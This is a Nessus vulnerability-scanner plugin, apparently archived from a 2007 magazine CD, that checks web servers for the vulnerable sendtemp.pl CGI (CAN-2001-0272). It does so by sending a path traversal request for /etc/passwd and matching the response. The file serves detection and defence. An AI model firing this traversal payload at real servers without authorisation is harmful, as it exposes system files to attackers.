home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / sendtemp.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10614);
  10.  script_bugtraq_id(2504);
  11.  script_version ("$Revision: 1.11 $");
  12.  script_cve_id("CAN-2001-0272");
  13.  
  14.  name["english"] = "sendtemp.pl";
  15.  name["francais"] = "sendtemp.pl";
  16.  
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "The 'sendtemp.pl' CGI is installed. This CGI has
  20. a well known security flaw that lets an attacker read arbitrary files
  21. with the privileges of the http daemon (usually root or nobody).
  22.  
  23. Solution : remove it from /cgi-bin.
  24.  
  25. Risk factor : High";
  26.  
  27.  
  28.  desc["francais"] = "Le cgi 'sendtemp.pl' est installΘ. Celui-ci possΦde
  29. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
  30. lire des fichiers arbitraires au daemon http, avec les privilΦges
  31. de celui-ci (root ou nobody). 
  32.  
  33. Solution : retirez-le de /cgi-bin.
  34.  
  35. Facteur de risque : SΘrieux";
  36.  
  37.  
  38.  script_description(english:desc["english"], francais:desc["francais"]);
  39.  
  40.  summary["english"] = "Checks for the presence of /cgi-bin/sendtemp.pl";
  41.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/sendtemp.pl";
  42.  
  43.  script_summary(english:summary["english"], francais:summary["francais"]);
  44.  
  45.  script_category(ACT_GATHER_INFO);
  46.  
  47.  
  48.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  49.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  50.  family["english"] = "CGI abuses";
  51.  family["francais"] = "Abus de CGI";
  52.  script_family(english:family["english"], francais:family["francais"]);
  53.  script_dependencie("find_service.nes", "no404.nasl");
  54.  script_require_ports("Services/www", 80);
  55.  exit(0);
  56. }
  57.  
  58. #
  59. # The script code starts here
  60. #
  61.  
  62. include("http_func.inc");
  63. include("http_keepalive.inc");
  64.  
  65.  
  66. port = get_http_port(default:80);
  67.  
  68. if(!get_port_state(port))exit(0);
  69.  
  70. foreach dir (cgi_dirs())
  71. {
  72. req = http_get(item:string(dir, "/sendtemp.pl?templ=../../../../../etc/passwd"),
  73.          port:port);
  74. r = http_keepalive_send_recv(port:port, data:req);
  75. if( r == NULL ) exit(0);
  76. if(egrep(pattern:".*root:.*:0:[01]:.*", string:r)){
  77.      security_hole(port);
  78.     exit(0);
  79.     }
  80. }    
  81.  
  82.